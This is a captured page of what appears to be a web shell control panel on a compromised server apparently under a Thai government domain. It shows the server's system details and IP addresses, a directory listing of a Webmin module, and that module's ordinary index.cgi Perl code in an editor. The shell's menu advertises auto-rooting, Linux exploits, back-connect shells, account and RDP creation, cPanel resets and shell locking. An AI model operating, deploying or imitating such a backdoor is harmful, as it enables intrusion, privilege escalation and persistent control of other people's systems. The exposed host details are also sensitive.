Linux ns8.secondary29.go.th 2.6.32-754.28.1.el6.x86_64 #1 SMP Wed Mar 11 18:38:45 UTC 2020 x86_64
Apache/2.2.15 (CentOS)
: 122.154.134.11 | : 122.154.134.9
Cant Read [ /etc/named.conf ]
5.6.40
apache
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
libexec /
webmin /
heartbeat /
[ HOME SHELL ]
Name
Size
Permission
Action
images
[ DIR ]
drwxr-xr-x
lang
[ DIR ]
drwxr-xr-x
apply.cgi
219
B
-rwxr-xr-x
backup_config.pl
630
B
-rwxr-xr-x
config
479
B
-rw-r--r--
config-freebsd
415
B
-rw-r--r--
config-generic-linux
322
B
-rw-r--r--
config-slackware-linux
322
B
-rw-r--r--
config-solaris
235
B
-rw-r--r--
config-syno-linux
219
B
-rw-r--r--
config.info
726
B
-rw-r--r--
config.info.bg
834
B
-rw-r--r--
config.info.bg.UTF-8
1.28
KB
-rw-r--r--
config.info.ca
825
B
-rw-r--r--
config.info.ca.UTF-8
846
B
-rw-r--r--
config.info.cz
643
B
-rw-r--r--
config.info.cz.UTF-8
676
B
-rw-r--r--
config.info.de
878
B
-rw-r--r--
config.info.de.UTF-8
878
B
-rw-r--r--
config.info.es
516
B
-rw-r--r--
config.info.es.UTF-8
524
B
-rw-r--r--
config.info.hu
443
B
-rw-r--r--
config.info.hu.UTF-8
483
B
-rw-r--r--
config.info.nl
806
B
-rw-r--r--
config.info.nl.UTF-8
806
B
-rw-r--r--
config.info.no
784
B
-rw-r--r--
config.info.no.UTF-8
784
B
-rw-r--r--
edit_auth.cgi
944
B
-rwxr-xr-x
edit_conf.cgi
6.68
KB
-rwxr-xr-x
edit_node.cgi
2.96
KB
-rwxr-xr-x
edit_res.cgi
2.26
KB
-rwxr-xr-x
feedback_files.pl
110
B
-rwxr-xr-x
heartbeat-lib.pl
4.78
KB
-rwxr-xr-x
index.cgi
3.3
KB
-rwxr-xr-x
install_check.pl
564
B
-rwxr-xr-x
module.info
200
B
-rw-r--r--
module.info.ca
133
B
-rw-r--r--
module.info.ca.UTF-8
147
B
-rw-r--r--
module.info.cz
26
B
-rw-r--r--
module.info.cz.UTF-8
32
B
-rw-r--r--
module.info.de
133
B
-rw-r--r--
module.info.de.UTF-8
145
B
-rw-r--r--
module.info.es
26
B
-rw-r--r--
module.info.es.UTF-8
32
B
-rw-r--r--
module.info.ms_MY
127
B
-rw-r--r--
module.info.ms_MY.UTF-8
139
B
-rw-r--r--
module.info.nl
25
B
-rw-r--r--
module.info.nl.UTF-8
31
B
-rw-r--r--
module.info.no
33
B
-rw-r--r--
module.info.no.UTF-8
39
B
-rw-r--r--
save_auth.cgi
469
B
-rwxr-xr-x
save_conf.cgi
3.56
KB
-rwxr-xr-x
save_node.cgi
1.27
KB
-rwxr-xr-x
start.cgi
246
B
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : index.cgi
#!/usr/bin/perl # index.cgi # Display heartbeat option categories require './heartbeat-lib.pl'; # Try to work out the version number $heartbeat_version = undef; if ($config{'version'}) { $heartbeat_version = $config{'version'}; } elsif (&backquote_command("($config{'heartbeat'} -V) </dev/null 2>&1") =~ /(\S+)/) { $heartbeat_version = $1; } elsif (&foreign_check("software")) { &foreign_require("software", "software-lib.pl"); local @pinfo = &software::package_info("heartbeat"); if (@pinfo) { $heartbeat_version = $pinfo[4]; $heartbeat_version =~ s/-.*$//; } } &open_tempfile(VERSION, ">$module_config_directory/version"); &print_tempfile(VERSION, $heartbeat_version,"\n"); &close_tempfile(VERSION); &ui_print_header(undef, $text{'index_title'}, "", undef, 1, 1, 0, &help_search_link("heartbeat", "man", "doc"), undef, undef, $heartbeat_version ? &text('index_version', $heartbeat_version) : undef); # Check if heartbeat is installed if (!-d $config{'ha_dir'}) { print &text('index_edir', "<tt>$config{'ha_dir'}</tt>", "$gconfig{'webprefix'}/config.cgi?$module_name"),"<p>\n"; &ui_print_footer("/", $text{'index'}); exit; } # Check if the config files exist, or if they can be copied if (!-r $ha_cf && -r $config{'alt_ha_cf'}) { system("cp '$config{'alt_ha_cf'}' $ha_cf"); } if (!-r $ha_cf) { print &text('index_eha_cf', "<tt>$ha_cf</tt>", "$gconfig{'webprefix'}/config.cgi?$module_name"),"<p>\n"; &ui_print_footer("/", $text{'index'}); exit; } if (!-r $haresources && -r $config{'alt_haresources'}) { system("cp '$config{'alt_haresources'}' '$haresources'"); } if (!-r $haresources) { print &text('index_eharesources', "<tt>$haresources</tt>", "$gconfig{'webprefix'}/config.cgi?$module_name"),"<p>\n"; &ui_print_footer("/", $text{'index'}); exit; } if (!-r $authkeys && -r $config{'alt_authkeys'}) { system("cp '$config{'alt_authkeys'}' '$authkeys'"); } if (!-r $authkeys) { print &text('index_eauthkeys', "<tt>$authkeys</tt>", "$gconfig{'webprefix'}/config.cgi?$module_name"),"<p>\n"; &ui_print_footer("/", $text{'index'}); exit; } if (!-r $config{'req_resource_cmd'}) { print &text('index_ereq_resource_cmd', "<tt>$config{'req_resource_cmd'}</tt>", "$gconfig{'webprefix'}/config.cgi?$module_name"),"<p>\n"; &ui_print_footer("/", $text{'index'}); exit; } @opts = ( 'conf', 'res','auth' ); @links = map { "edit_${_}.cgi" } @opts; @titles = map { $text{"${_}_title"} } @opts; @icons = map { "images/${_}.gif" } @opts; &icons_table(\@links, \@titles, \@icons); print &ui_hr(); print "<table width=100%><tr>\n"; # Show status $status = `($config{'heartbeat'} -s) </dev/null 2>&1`; print "<tr> <td><b>$text{'index_status'}</b></td>\n"; print "<td><tt>$status</tt></td> </tr>\n"; # Show start/stop button if (&check_pid_file($config{'pid_file'})) { print "<form action=apply.cgi>\n"; print "<td><input type=submit value='$text{'index_apply'}'></td>\n"; print "<td>$text{'index_applymsg'}</td>\n"; print "</form>\n"; } else { print "<form action=start.cgi>\n"; print "<td><input type=submit value='$text{'index_start'}'></td>\n"; print "<td>$text{'index_startmsg'}</td>\n"; print "</form>\n"; } print "</tr></table>\n"; if (!$heartbeat_version) { print "<center><b>",&text('index_noversion', "../config.cgi?$module_name"),"</b></center>\n"; } &ui_print_footer("/", $text{'index'});
Close